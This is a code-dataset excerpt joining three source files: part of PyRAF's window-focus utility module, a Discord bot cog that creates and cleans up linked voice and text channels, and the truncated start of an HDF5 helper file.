aqutil\")\n\nexcept ImportError:\n _has_xutil = 0 # Unsuccessful init of XWindow\nexcept OSError:\n _has_xutil = 0 # Unsuccessful init of XWindow\n\n# Clean up the namespace a bit...\ntry:\n del xutil\nexcept NameError:\n pass # may not have imported it\n\nimport termios\nmagicConstant = termios.TIOCGWINSZ\n\n\ndef getScreenDepth():\n return getDeepestVisual()\n\n\n# maintain a dictionary of top level IDs to avoid repeated effort here\ntopIDmap = {}\n\n\ndef getTopID(WindowID):\n \"\"\"Find top level windows ID, parent of given window.\n If window is already top (or not implemented), it returns its own ID.\n If the input Id represents the root window then it will just\n return itself\"\"\"\n wid = WindowID\n if wid <= 0:\n return wid\n\n # a \"top ID\" makes less sense if we are not using X\n if not WUTIL_USING_X:\n if _has_aqutil:\n return aqutil.getTopIdFor(wid)\n else:\n return wid # everything is its own top\n\n if wid in topIDmap:\n return topIDmap[wid]\n try:\n oid = wid\n while True:\n pid = getParentID(wid)\n if (not pid) or (pid == wid):\n topIDmap[oid] = wid\n return wid\n else:\n wid = pid\n except OSError:\n return None\n\n\ndef forceFocusToNewWindow():\n \"\"\" This is used to make sure that a window which just popped up is\n actually in the front, where focus would be. With X, any new window\n comes to the front anyway, so this is a no-op. Currently this is\n only necessary under Aqua. \"\"\"\n if _has_aqutil:\n aqutil.focusOnGui()\n\n\ndef isViewable(WindowID):\n\n if not WUTIL_USING_X:\n return 1 # native OSX code still under dev.; make everything viewable\n attrdict = getWindowAttributes(WindowID)\n if attrdict:\n return attrdict['viewable']\n else:\n return 1\n\n\ndef getTermWindowSize():\n \"\"\"return a tuple containing the y,x (rows,cols) size of the terminal window\n in characters\"\"\"\n\n if magicConstant is None:\n raise Exception(\"platform isn't supported: \" + sys.platform)\n\n # define string to serve as memory area to receive copy of structure\n # created by IOCTL call\n tstruct = ' ' * 20 # that should be more than enough memory\n try:\n rstruct = fcntl.ioctl(sys.stdout.fileno(), magicConstant, tstruct)\n ysize, xsize = struct.unpack('hh', rstruct[0:4])\n # handle bug in konsole (and maybe other bad cases)\n if ysize <= 0:\n ysize = 24\n if xsize <= 0:\n xsize = 80\n return ysize, xsize\n except OSError:\n return (24, 80) # assume generic size\n\n\nclass FocusEntity:\n \"\"\"Represents an interface to peform focus manipulations on a variety of\n window objects. This allows the windows to be handled by code that does\n not need to know the specifics of how to set focus to, restore focus\n to, warp the cursor to, etc. Since nothing is implemented, it isn't\n necessary to inherit it, but inheriting it does allow type checks to\n see if an object is a subclass of FocusEntity.\n \"\"\"\n\n def saveCursorPos(self):\n \"\"\"When this method is called, the object should know how to save\n the current position of the cursor in the window. If the cursor is\n not in the window or the window does not currently have focus, it\n should do nothing.\"\"\"\n # raise exceptions to ensure implemenation of required methods\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n def forceFocus(self, cursorToo=True):\n \"\"\"When called, the object should force focus to the window it\n represents and warp the cursor to it using the last saved cursor\n position.\"\"\"\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n def getWindowID(self):\n \"\"\"return a window ID that can be used to find the top window\n of the window heirarchy.\"\"\"\n raise NotImplementedError(\"class FocusEntity cannot be used directly\")\n\n\nclass TerminalFocusEntity(FocusEntity):\n \"\"\"Implementation of FocusEntity interface for the originating\n terminal window\"\"\"\n\n def __init__(self):\n \"\"\"IMPORTANT: This class must be instantiated while focus\n is in the terminal window\"\"\"\n self.lastScreenX = None\n self.lastScreenY = None\n try:\n self.windowID = getFocalWindowID()\n if self.windowID == -1:\n self.windowID = None\n if _has_aqutil:\n scrnPosDict = aqutil.getPointerGlobalPosition()\n self.lastScreenX = scrnPosDict['x']\n self.lastScreenY = scrnPosDict['y']\n except OSError:\n self.windowID = None\n self.lastX = 30\n self.lastY = 30\n\n def getWindowID(self):\n return self.windowID\n\n def forceFocus(self, cursorToo=True):\n if WUTIL_ON_MAC and WUTIL_USING_X:\n return # X ver. under dev. on OSX... (was broken anyway)\n if not (self.windowID and isViewable(self.windowID)):\n # no window or not viewable\n return\n if self.windowID == getFocalWindowID():\n # focus is already here\n return\n if _has_aqutil:\n if self.lastScreenX is not None and cursorToo:\n moveCursorTo(self.windowID, self.lastScreenX, self.lastScreenY,\n 0, 0)\n else: # WUTIL_USING_X\n if self.lastX is not None and cursorToo:\n moveCursorTo(self.windowID, 0, 0, self.lastX, self.lastY)\n if not GRAPHICS_ALWAYS_ON_TOP:\n setFocusTo(self.windowID)\n\n def saveCursorPos(self):\n if (not self.windowID) or (self.windowID != getFocalWindowID()):\n return\n if _has_aqutil:\n scrnPosDict = aqutil.getPointerGlobalPosition()\n self.lastScreenX = scrnPosDict['x']\n self.lastScreenY = scrnPosDict['y']\n return\n if not WUTIL_USING_X:\n return # some of the following xutil methods are undefined\n\n # This also won't work on a Mac if running from the Terminal app\n # but it WILL work on a Mac from an X11 xterm window\n if WUTIL_USING_X and WUTIL_ON_MAC and self.windowID < 2:\n return\n\n posdict = getPointerPosition(self.windowID)\n if posdict:\n x = posdict['win_x']\n y = posdict['win_y']\n else:\n return\n windict = getWindowAttributes(self.windowID)\n if windict and windict['width'] > 0:\n maxX = windict['width']\n maxY = windict['height']\n else:\n return\n # do nothing if position out of window\n if x < 0 or y < 0 or x >= maxX or y >= maxY:\n return\n self.lastX = x\n self.lastY = y\n\n # some extra utility methods\n\n def updateWindowID(self, id=None):\n \"\"\"Update terminal window ID (to current window if id is not given)\"\"\"\n if id is None:\n id = getFocalWindowID()\n self.windowID = id\n\n def getWindowSize(self):\n \"\"\"return a tuple containing the x,y size of the terminal window\n in characters\"\"\"\n\n # define string to serve as memory area to receive copy of structure\n # created by IOCTL call\n tstruct = ' ' * 20 # that should be more than enough memory\n # xxx exception handling needed (but what exception to catch?)\n rstruct = fcntl.ioctl(sys.stdout.fileno(), magicConstant, tstruct)\n xsize, ysize = struct.unpack('hh', rstruct[0:4])\n return xsize, ysize\n\n\nclass FocusController:\n \"\"\"A mediator that allows different components to give responsibility\n to this class for deciding how to manipulate focus. It is this class\n that knows what elements are available and where focus should be returned\n to when asked to restore the previous focus and cursor position. The\n details of doing it for different windows are encapsulated in descendants\n of the FocusEntity objects that it contains. Since this is properly\n a singleton, it is created by the wutil module itself and accessed\n as an object of wutil\"\"\"\n\n def __init__(self, termwindow):\n self.focusEntities = {'terminal': termwindow}\n self.focusStack = [termwindow]\n self.hasGraphics = termwindow.getWindowID() is not None\n\n def addFocusEntity(self, name, focusEntity):\n if name == 'terminal':\n return # ignore any attempts to change terminal entity\n if name in self.focusEntities:\n return # ignore for now, not sure what proper behavior is\n self.focusEntities[name] = focusEntity\n\n def removeFocusEntity(self, focusEntityName):\n\n if focusEntityName in self.focusEntities:\n entity = self.focusEntities[focusEntityName]\n del self.focusEntities[focusEntityName]\n try:\n while True:\n self.focusStack.remove(entity)\n except ValueError:\n pass\n\n def restoreLast(self):\n\n if not self.hasGraphics:\n return\n if len(self.focusStack) > 1:\n # update current position if we're in the correct window\n current = self.focusStack.pop()\n if current.getWindowID() == getFocalWindowID():\n current.saveCursorPos()\n if self.focusInFamily():\n self.focusStack[-1].forceFocus()\n\n def setCurrent(self, force=0):\n \"\"\"This is to be used in cases where focus has been lost to\n a window not part of this scheme (dialog boxes for example)\n and it is desired to return focus to the entity currently considered\n active.\"\"\"\n if self.hasGraphics and (force or self.focusInFamily()):\n self.focusStack[-1].forceFocus()\n\n def resetFocusHistory(self):\n # self.focusStack = [self.focusEntities['terminal']]\n last = self.focusStack[-1]\n self.focusStack = self.focusStack[:1]\n if last != self.focusStack[-1]:\n self.setCurrent()\n\n def getCurrentFocusEntity(self):\n \"\"\"Return the focus entity that currently has focus.\n Return None if focus is not in the focus family\"\"\"\n if not self.hasGraphics:\n return None, None\n currentFocusWinID = getFocalWindowID()\n currentTopID = getTopID(currentFocusWinID)\n for name, focusEntity in self.focusEntities.items():\n if getTopID(focusEntity.getWindowID()) == currentTopID:\n return name, focusEntity\n else:\n return None, None\n\n def saveCursorPos(self):\n\n if self.hasGraphics:\n name, focusEntity = self.getCurrentFocusEntity()\n if focusEntity:\n focusEntity.saveCursorPos()\n\n def setFocusTo(self, focusTarget, always=0):\n \"\"\"focusTarget can be a string or a FocusEntity. It is possible to\n give a FocusEntity that is not in focusEntities (so it isn't\n considered part of the focus family, but is part of the restore\n chain.)\n\n If always is true, target is added to stack even if it is already\n the focus (useful for pairs of setFocusTo/restoreLast calls.)\n \"\"\"\n if (focusTarget is None) or (not self.hasGraphics):\n return\n if not WUTIL_USING_X:\n if hasattr(focusTarget, 'gwidget'): # gwidget is a Canvas\n focusTarget.gwidget.focus_set()\n\n current = self.focusStack[-1]\n if isinstance(focusTarget, str):\n next = self.focusEntities[focusTarget]\n else:\n next = focusTarget\n # only append if focus stack last entry different from new\n if next != self.focusStack[-1] or always:\n self.focusStack.append(next)\n if self.focusInFamily():\n current.saveCursorPos()\n next.forceFocus()\n\n def getFocusEntity(self, FEName):\n \"\"\"See if named Focus Entity is currently registered. Return it\n if it exists, None otherwise\"\"\"\n\n return self.focusEntities.get(FEName)\n\n def focusInFamily(self):\n \"\"\"Determine if current focus is within the pyraf family\n (as defined by self.focusEntities)\"\"\"\n if not self.hasGraphics:\n return 0\n currentFocusWinID = getFocalWindowID()\n currentTopID = getTopID(currentFocusWinID)\n for focusEntity in self.focusEntities.values():\n fwid = focusEntity.getWindowID()\n if fwid:\n if getTopID(fwid) == currentTopID:\n return 1\n return 0 # not in family\n\n def getCurrentMark(self):\n \"\"\"Returns mark that can be used to restore focus to current setting\"\"\"\n return len(self.focusStack)\n\n def restoreToMark(self, mark):\n \"\"\"Restore focus to value at mark\"\"\"\n last = self.focusStack[-1]\n self.focusStack = self.focusStack[:mark]\n if last != self.focusStack[-1]:\n self.setCurrent()\n\n\nterminal = TerminalFocusEntity()\nfocusController = FocusController(terminal)\n\n\n# debug helper\ndef dumpspecs(outstream=None, skip_volatiles=False):\n \"\"\" Dump various flags, settings, values to the terminal. This is not to\n be used internal to this module - it must wait until the module is fully\n imported for all the values to be finalized. If outstream is not given,\n this will simply dump to sys.stdout. \"\"\"\n\n pyrver = 'unknown'\n try:\n from pyraf import __version__ as pyrver\n except ImportError:\n pass\n\n out = \"python exec = \" + str(sys.executable)\n if skip_volatiles:\n out += \"\\npython ver = \" + '.'.join(\n [str(v) for v in sys.version_info[0:2]])\n else:\n out += \"\\npython ver = \" + '.'.join(\n [str(v) for v in sys.version_info[0:3]])\n out += \"\\nplatform = \" + str(sys.platform)\n if not skip_volatiles:\n out += \"\\nPyRAF ver = \" + pyrver\n out += \"\\nc.OF_GRAPHICS = \" + str(capable.OF_GRAPHICS)\n dco = 'not yet known'\n if skip_volatiles:\n out += \"\\n/dev/console owner = \"\n else:\n dco = capable.get_dc_owner(False, True)\n out += \"\\n/dev/console owner = \" + str(dco)\n\n if not capable.OF_GRAPHICS:\n out += \"\\ntkinter use unattempted.\"\n else:\n import tkinter\n out += \"\\nTclVersion = \" + str(tkinter.TclVersion)\n out += \"\\nTkVersion = \" + str(tkinter.TkVersion)\n out += \"\\nWUTIL_ON_MAC = \" + str(WUTIL_ON_MAC)\n out += \"\\nWUTIL_ON_WIN = \" + str(WUTIL_ON_WIN)\n out += \"\\nWUTIL_USING_X = \" + str(WUTIL_USING_X)\n out += \"\\nis_darwin_and_x = \" + str(capable.is_darwin_and_x())\n if WUTIL_ON_MAC:\n out += \"\\nwhich_darwin_linkage = \" + str(\n capable.which_darwin_linkage())\n out += \"\\nwhich_darwin_linkage2 = \" + str(\n capable.which_darwin_linkage(force_otool_check=True))\n else:\n out += \"\\nwhich_darwin_linkage = (not darwin)\"\n out += \"\\nskip display = \" + str(_skipDisplay)\n out += \"\\nhas graphics = \" + str(hasGraphics)\n out += \"\\nimported aqutil = \" + str(bool(_has_aqutil))\n out += \"\\nimported xutil = \" + str(bool(_has_xutil))\n\n # Case of WUTIL_USING_X and not _has_xutil means either they don't have\n # xutil library installed, or they do but they can't draw to screen\n if WUTIL_USING_X and capable.OF_GRAPHICS and \\\n not _skipDisplay and not bool(_has_xutil):\n # quick debug help here for case where xutil didn't build\n out += '\\n\\tWARNING! PyRAF may be missing the \"xutil\" library. See PyRAF FAQ 1.9'\n if 'PYRAFGRAPHICS' in os.environ:\n val = os.environ['PYRAFGRAPHICS']\n out += \"\\nPYRAFGRAPHICS = \" + val\n if val == \"matplotlib\":\n mpl_ok = False\n try:\n import matplotlib as mpl\n mpl_ok = True\n except ImportError:\n out += \"\\nCannot import matplotlib\"\n if mpl_ok:\n if hasattr(mpl, 'tk_window_focus'):\n out += \"\\nmpl.tk_window_focus = \" + str(\n mpl.tk_window_focus())\n else:\n out += \"\\nmpl.tk_window_focus = function not supported\"\n mpldir = os.path.split(mpl.__file__)[0]\n import glob\n flist = glob.glob(mpldir + os.path.sep + 'backends' +\n os.path.sep + '*.so')\n flist = [os.path.split(f)[1] for f in flist]\n out += \"\\nmpl backends = \" + str(flist)\n tkaggbknd = mpldir + '/backends/_tkagg.so'\n if os.path.exists(tkaggbknd):\n out += \"\\ntry: /usr/bin/otool -L \" + tkaggbknd\n else:\n out += \"\\nPYRAFGRAPHICS not set\"\n\n if outstream:\n outstream.write(out + '\\n')\n else:\n print(out)\n\n\n# Finally, do we have access to a graphics display?\nhasGraphics = None\nif _skipDisplay:\n # A common _skipDisplay case is pyraf being imported in a script,\n # in which case we keep quiet about the lack of graphics.\n # But DO warn for interactive sessions where they didn't use '-s'\n if sys.argv[0].find('pyraf') >= 0 and \\\n '-s' not in sys.argv and '--silent' not in sys.argv:\n # Warn, but be specific about why\n if 'PYRAF_NO_DISPLAY' in os.environ:\n print(\"No graphics/display intended for this session.\")\n else:\n print(\"No graphics/display possible for this session.\")\nelse:\n if _has_xutil or _has_aqutil:\n hasGraphics = focusController.hasGraphics\n elif WUTIL_ON_MAC: # on a Mac but loaded no graphcs libs (aqutil/xutil)\n # Handle case where we are on the Mac with no X and no PyObjc. We can\n # still run, albeit without automatic mouse moving and focus jumping.\n hasGraphics = focusController.hasGraphics\n if hasGraphics:\n if capable.which_darwin_linkage() == 'aqua':\n print(\n \"\\nLimited graphics available on OSX (aqutil not loaded)\\n\"\n )\n else:\n print(\n \"\\nLimited graphics available on OSX (xutil not loaded)\\n\"\n )\n elif WUTIL_ON_WIN:\n hasGraphics = 1 # try this, tho VERY limited (epar only I guess)\n print(\"\\nLimited graphics available on win32 platform\\n\")\n\n if not hasGraphics:\n print(\"\")\n print(\"No graphics display available for this session.\")\n print(\"Graphics tasks that attempt to plot to an interactive \"\n \"screen will fail.\")\n print('For help, search \"PyRAF FAQ 5.13\"')\n print(\"\")\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/wutil.py","file_name":"wutil.py","file_ext":"py","file_size_in_byte":22438,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"27452204287","text":"from typing import Union, Tuple, List, Dict\nimport random\nimport time\n\nimport discord\nfrom discord.ext import commands\n\nfrom environment import PREFIX, CHANNEL_TRACK_LIMIT\nimport database.db_models as db\nimport database.access_settings_db as settings_db\nimport database.access_channels_db as channels_db\nimport utils as utl\n\n\nasync def make_channel(voice_state: discord.VoiceState, member: discord.Member, bot_member: discord.Member,\n voice_overwrites: Dict[Union[discord.Member, discord.Role], discord.PermissionOverwrite],\n vc_name=\"voice-channel\", tc_name=\"text-channel\", channel_type=\"public\") -> Tuple[\n discord.VoiceChannel, discord.TextChannel]:\n \"\"\"\n Method to create a voice-channel with linked text-channel logging to DB included\\n\n -> VCs created with this method are meant to be deleted later on, therefore they're logged to DB\n\n :param voice_state: To detect which VC the member is in\n :param member: To access guild and give member TC access permissions\n :param bot_member: Bot as member to enable access on all created channels\n :param voice_overwrites: To give member extra permissions in the VC and TC (bot permissions will be added / edited)\n :param vc_name: Voice Channel name\n :param tc_name: Text Channel name\n :param channel_type: For SQL-logging can be \"public\" or \"private\"\n\n :returns: Created Text and VoiceChannel Objects\n \"\"\"\n # TODO handle error on creation - especially admin permission errors\n # if ctx.me.guild_permissions.administrator...\n \n # add bot to voice channel overwrites to ensure that bot can mange the channel\n bot_overwrites: Union[discord.PermissionOverwrite, None] = voice_overwrites.get(bot_member, None)\n # check if some configurations for bot were made - update overwrites accordingly\n if bot_overwrites is not None:\n bot_overwrites.update(view_channel=True, connect=True)\n else:\n voice_overwrites[bot_member] = discord.PermissionOverwrite(view_channel=True, connect=True)\n\n # create channels\n v_channel: discord.VoiceChannel = await member.guild.create_voice_channel(\n vc_name, category=voice_state.channel.category, overwrites=voice_overwrites)\n\n t_channel: discord.TextChannel = await member.guild.create_text_channel(\n tc_name, category=voice_state.channel.category,\n overwrites={member: discord.PermissionOverwrite(view_channel=True),\n bot_member: discord.PermissionOverwrite(view_channel=True),\n member.guild.default_role: discord.PermissionOverwrite(view_channel=False)})\n\n # add channels to database\n channels_db.add_channel(v_channel.id, t_channel.id, member.guild.id, channel_type, v_channel.category.id)\n\n return v_channel, t_channel\n\n\ndef is_create_channel(guild: discord.Guild, channel: discord.VoiceChannel) -> bool:\n return True if settings_db.get_setting(guild.id, \"create_channel\", str(channel.id)) else False\n\n\ntc_sign_prefix = \"🔊-\" # shall be placed in {0} of text channel names, to highlight that channel is 'special'\nsign_public = \"â• \" # shall be placed in {1} of public channel names, to highlight that channel is 'public'\nsign_private = \"🔒\" # shall be placed in {1} of private channel names, to highlight that channel is 'private'\nchannel_names = {\"public_channel\": [\n # voice channel name, text channel name\n [\"{1}{0}'s discussion\", \"{0}-{1}'s discussion\"],\n [\"{1}{0}'s voice channel\", \"{0}-{1}'s text channel\"],\n [\"{1}{0}'s room\", \"{0}-{1}'s room\"],\n [\"{1}{0}'s open talk\", \"{0}-{1}'s open talk\"],\n [\"{1}{0}'s bar\", \"{0}-{1}'s bar\"],\n [\"{1}{0}'s public office\", \"{0}-{1}'s public office\"],\n [\"{1}{0}'s pool\", \"{0}-{1}'s pool\"],\n [\"{1}{0}'s bench\", \"{0}-{1}'s bench\"],\n [\"{1}{0}'s couch\", \"{0}-{1}'s couch\"],\n [\"{1}{0}'s channel\", \"{0}-{1}'s channel\"],\n ],\n\n \"private_channel\": [\n [\"{1}{0}'s private discussion\", \"{0}-{1}'s private discussion\"],\n [\"{1}{0}'s private fellowship\", \"{0}-{1}'s private fellowship\"],\n [\"{1}{0}'s private room\", \"{0}-{1}'s private room\"],\n [\"{1}{0}'s elite room\", \"{0}-{1}'s elite room\"],\n [\"{1}{0}'s regular table\", \"{0}-{1}'s regular table\"],\n [\"{1}{0}'s private haven\", \"{0}-{1}'s private haven\"],\n [\"{1}{0}'s private garden\", \"{0}-{1}'s private garden\"],\n ]\n }\n\n\nasync def create_new_channels(member: discord.Member,\n after: discord.VoiceState,\n channel_type: str,\n bot_member: discord.Member) -> Tuple[discord.VoiceChannel, discord.TextChannel]:\n \"\"\"\n :param member: member that issued the creation\n :param after: VoiceState that represents the state after the update\n :param channel_type: string that describes the type 'public_channel', 'private_channel'\n :param bot_member: needed to add bot itself to possibly hidden channel\n\n :returns: references to created voice and text channels\n \"\"\"\n\n # check if creator is allowed to rename a public channel\n allowed_to_edit = settings_db.get_first_setting_for(member.guild.id, \"allow_public_rename\")\n\n # get channel names from dict above\n new_channel_name = random.choice(channel_names[channel_type])\n\n # default overwrites for new channel\n voice_channel_permissions = after.channel.category.overwrites\n\n # overwriting permissions if channel shall be private\n is_private = channel_type == 'private_channel'\n if is_private:\n\n # prohibit everybody from joining except creator, give creator channel edit permissions\n voice_channel_permissions = {\n member.guild.default_role: discord.PermissionOverwrite(connect=False),\n member: discord.PermissionOverwrite(connect=True,\n manage_channels=True,\n manage_permissions=True)\n }\n\n # set extra permissions for creator if creators are allowed to edit public channels on this server\n elif allowed_to_edit and int(allowed_to_edit.value):\n voice_channel_permissions[member] = discord.PermissionOverwrite(connect=True,\n manage_channels=True)\n\n # add bot to channel so the bot can see and manage this channel without administrator\n voice_channel_permissions[bot_member] = discord.PermissionOverwrite(view_channel=True, connect=True)\n\n # issue creation of channels\n voice_channel, text_channel = await make_channel(after, member, bot_member, voice_channel_permissions,\n vc_name=new_channel_name[0].format(\n member.display_name,\n sign_private if is_private else sign_public),\n\n tc_name=new_channel_name[1].format(tc_sign_prefix,\n member.display_name),\n channel_type=channel_type)\n\n return voice_channel, text_channel\n\n\nasync def delete_text_channel(t_channel: discord.TextChannel, bot: commands.Bot,\n archive=None) -> Union[discord.TextChannel, None]:\n \"\"\"\n Checks whether channel shall be archived or deleted and executes that action\n\n Returns edited channel or None if channel was deleted\n \"\"\"\n\n async def is_message_in_channel():\n \"\"\" Check if there is more than the bots tutorial message in the channel \"\"\"\n\n # get enough messages to check\n messages: List[discord.Message] = await t_channel.history(limit=2).flatten()\n\n # channel is empty\n if len(messages) == 0:\n return False\n\n # only this bot has sent a message - probably the tutorial text -> assume empty\n elif len(messages) == 1 and messages[0].author.id == bot.user.id:\n return False\n\n return True\n\n # if archive is given and channel is not empty: move to archive\n if archive and await is_message_in_channel():\n\n await t_channel.edit(category=archive,\n reason=\"Connected voice channel is empty, archive channel with messages\",\n overwrites=archive.overwrites)\n return t_channel\n\n # delete channel\n await t_channel.delete(reason=\"Channel is empty and not needed anymore\")\n return None\n\n\nasync def clean_after_exception(voice_channel: discord.VoiceChannel, text_channel: discord.TextChannel,\n bot: commands.Bot,\n archive=None, log_channel=None):\n \"\"\" Cleanup routine that handles the deletion / activation of a voice- and text-channel\"\"\"\n await voice_channel.delete(reason=\"An error occurred - user most likely left the channel during the process\")\n await delete_text_channel(text_channel, bot, archive=archive)\n if log_channel:\n log_channel.send(\n embed=utl.make_embed(\n name=\"Warning\",\n value=\"An error occurred - user most likely left the voice during the channels were set up.\\n\"\n \"Cleanup finished.\",\n color=utl.orange\n )\n )\n\n\ndef generate_text_channel_overwrite(\n voice_channel: discord.VoiceChannel,\n bot_member: discord.Member) -> Dict[Union[discord.Role, discord.Member], discord.PermissionOverwrite]:\n \"\"\"\n Generates overwrites for linked text-channels\\n\n Gives read/ write permission to:\\n\n - roles that are registered as allowed in the settings\n - members that are currently in the voice channel\n - the bot member creating that channel\n\n Prohibits guilds default role from accessing the channel\n\n :param voice_channel: parent voice channel to create text channel overwrites for\n :param bot_member: needed to add bot itself to hidden channel\n\n :returns: overwrites dictionary ready to apply\n \"\"\"\n\n guild: discord.Guild = voice_channel.guild\n\n # get roles that have permissions to see all private TCs - like mods or bots\n allowed_roles: List[db.Settings] = settings_db.get_all_settings_for(guild.id, \"view_tc_role\")\n\n # roles that are allowed to see and write in channel by default\n role_overwrites = {\n guild.get_role(int(r.value)): discord.PermissionOverwrite(view_channel=True, send_messages=True)\n for r in allowed_roles} if allowed_roles else {}\n\n # exclude default role to make channel private\n role_overwrites[guild.default_role] = discord.PermissionOverwrite(view_channel=False)\n\n # overwrites that contain permissions for all member currently in the voice channel\n member_overwrites = {\n m: discord.PermissionOverwrite(view_channel=True, send_messages=True) for m in voice_channel.members\n }\n\n # add bot user self to channel, so bot can access the channel at any time\n member_overwrites[bot_member] = discord.PermissionOverwrite(view_channel=True, send_messages=True)\n\n # return joined dicts\n return {**role_overwrites, **member_overwrites}\n\n\nasync def update_channel_overwrites(after_channel: discord.VoiceChannel,\n created_channel: db.CreatedChannels, bot_member: discord.Member):\n # get new overwrites for text channel\n overwrites = generate_text_channel_overwrite(after_channel, bot_member)\n # get linked text channel\n linked_channel: discord.TextChannel = after_channel.guild.get_channel(created_channel.text_channel_id)\n # TODO: logging if text channel not exists\n if linked_channel:\n await linked_channel.edit(overwrites=overwrites)\n\n\nasync def send_welcome_message(text_channel: discord.TextChannel, linked_vc: discord.VoiceChannel):\n await text_channel.send(\n embed=utl.make_embed(\n name='Welcome to your own private channel!',\n value=f'Hey, this channel is only visible for people that are in your voice chat:\\n'\n f'{linked_vc.mention}\\n'\n \"You can use this channel to share conversation related stuff, \"\n \"use bot commands or just for other things.\\n\"\n 'Have fun!',\n footer='Please note that this channel will be removed '\n 'when everyone has left the affiliated voice channel.',\n color=utl.green\n )\n )\n\n\nclass VCCreator(commands.Cog):\n # Codename: PANTHEON\n \"\"\"\n A function that creates custom voice channels if triggered\n - Creates a dedicated voice-channel\n - Creates a private linked text-channel\n - Members will be added and removed to text-channel\n - There is an option for a customizable /private voice-channel\n \"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, member: discord.Member, before: discord.VoiceState,\n after: discord.VoiceState):\n\n # this is the case that a state update happens that is not a channel switch, but a mute or something like that\n if before.channel and after.channel and before.channel.id == after.channel.id:\n return\n\n # as shorthand - we'll need this a few times\n guild: discord.Guild = member.guild\n bot_member_on_guild: discord.Member = guild.get_member(self.bot.user.id)\n after_channel: Union[discord.VoiceChannel, None] = after.channel\n before_channel: Union[discord.VoiceChannel, None] = before.channel\n\n # open db session\n session = db.open_session()\n\n # get settings for archive and log channel\n log_entry = settings_db.get_first_setting_for(guild.id, \"log_channel\", session) # get entry if exists\n archive_entry = settings_db.get_first_setting_for(guild.id, \"archive_category\", session)\n\n # get channels from entries if existing\n log_channel: Union[discord.TextChannel, None] = guild.get_channel(int(log_entry.value)) if log_entry else None\n archive_category: Union[discord.CategoryChannel, None] = guild.get_channel(\n int(archive_entry.value)) if archive_entry else None\n\n # check if member has a voice channel after the state update\n # could trigger the creation of a new channel or require an update for an existing one\n if after_channel:\n\n # check db if channel is a channel that was created by the bot\n created_channel: Union[db.CreatedChannels, None] = channels_db.get_voice_channel_by_id(after_channel.id, session)\n\n # check if joined (after) channel is a channel that triggers a channel creation\n tracked_channel = settings_db.get_setting_by_value(guild.id, after_channel.id, session)\n\n if tracked_channel:\n voice_channel, text_channel = await create_new_channels(member, after,\n tracked_channel.setting, bot_member_on_guild)\n\n # write to log channel if configured\n if log_entry:\n await log_channel.send(\n embed=utl.make_embed(\n name=\"Created voice channel\",\n value=f\"{member.mention} created `{voice_channel.name if voice_channel else '`deleted`'}` \"\n f\"with {text_channel.mention if text_channel else '`deleted`'}\",\n color=utl.green\n )\n )\n\n # moving creator to created channel\n try:\n await member.move_to(voice_channel, reason=f'{member} issued creation')\n await send_welcome_message(text_channel, voice_channel) # send message explaining text channel\n \n # if user already left already\n except discord.HTTPException as e:\n print(\"Handle HTTP exception during creation of channels - channel was already empty\")\n await clean_after_exception(voice_channel, text_channel, self.bot,\n archive=archive_category, log_channel=log_channel)\n\n # channel is in our database - add user to linked text_channel\n elif created_channel:\n\n # static channels need a new linked text-channel if they were empty before\n if created_channel.internal_type == 'static_channel' and created_channel.text_channel_id is None:\n\n try:\n tc_overwrite = generate_text_channel_overwrite(after_channel, self.bot.user)\n text_channel = await guild.create_text_channel(f\"{tc_sign_prefix}{after_channel.name}\",\n overwrites=tc_overwrite,\n category=after_channel.category,\n reason=\"User joined linked voice channel\")\n created_channel.text_channel_id = text_channel.id\n session.add(created_channel)\n session.flush()\n\n await send_welcome_message(text_channel, after_channel) # send message explaining text channel\n\n except discord.HTTPException as e:\n # TODO: log this\n pass\n\n # processing 'normal', existing linked channel\n else:\n # update overwrites to add user to joined channel\n # TODO we can skip this API call when the creator just got moved\n await update_channel_overwrites(after_channel, created_channel, bot_member_on_guild)\n\n if before_channel:\n\n # check db if before channel is a channel that was created by the bot\n created_channel: Union[db.CreatedChannels, None] = channels_db.get_voice_channel_by_id(before_channel.id, session)\n\n if created_channel:\n # member left but there are still members in vc\n if before_channel.members:\n # remove user from left linked channel\n await update_channel_overwrites(before_channel, created_channel, bot_member_on_guild)\n\n # left channel is now empty\n else:\n # fetch needed information\n before_channel_id: int = before_channel.id # extract id before deleting, needed for db deletion\n text_channel: Union[discord.TextChannel, None] = guild.get_channel(created_channel.text_channel_id)\n\n # delete channels - catch AttributeErrors to still do the db access and the logging\n\n # delete VC only if it's not a static_channel\n if created_channel.internal_type != 'static_channel':\n try:\n await before_channel.delete(reason=\"Channel is empty\")\n except AttributeError:\n pass\n\n # archive or delete linked text channel\n try:\n archived_channel = await delete_text_channel(text_channel, self.bot, archive=archive_category)\n\n except AttributeError:\n archived_channel = None\n\n except discord.errors.HTTPException:\n # occurs when category that the channel shall be moved to is full\n archived_channel = None\n await log_channel.send(\n embed=utl.make_embed(\n name=\"ERROR handling linked text channel\",\n value=f\"This error probably means that the archive `{archive_category.mention}` is full.\\n\"\n \"Please check the category and it and set a new one or delete older channels.\\n\"\n \"Text channel was not deleted\",\n color=utl.red))\n\n if log_channel:\n static = True if created_channel.internal_type == 'static_channel' else False # helper variable\n\n await log_channel.send(\n embed=utl.make_embed(\n name=f\"Removed {text_channel.name}\" if static else f\"Deleted {before_channel.name}\",\n value=f\"{text_channel.mention} was linked to {before_channel.name} and is \" if static\n else f\"The linked text channel {text_channel.mention} is \"\n f\"{'moved to archive' if archived_channel is not None and archive_category else 'deleted'}\",\n color=utl.green\n )\n )\n\n if created_channel.internal_type == 'static_channel':\n # remove reference to now archived channel\n created_channel.text_channel_id = None\n session.add(created_channel)\n session.flush()\n\n else:\n # remove deleted channel from database\n channels_db.del_channel(before_channel_id)\n\n session.commit()\n session.close()\n\n\ndef setup(bot):\n bot.add_cog(VCCreator(bot))\n","repo_name":"nonchris/discord-fury","sub_path":"src/cogs/on_voice_update.py","file_name":"on_voice_update.py","file_ext":"py","file_size_in_byte":22241,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"47"} +{"seq_id":"11446475638","text":"\"\"\"\nContains the helper functions for creating h5 files\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport os\nimport pandas as pd\n\n##########################\n# 3D preprocessing utils #\n##########################\ndef savePatchIter_bag_hdf5_3D(patch):\n \"\"\"\n Save patch iteratively to 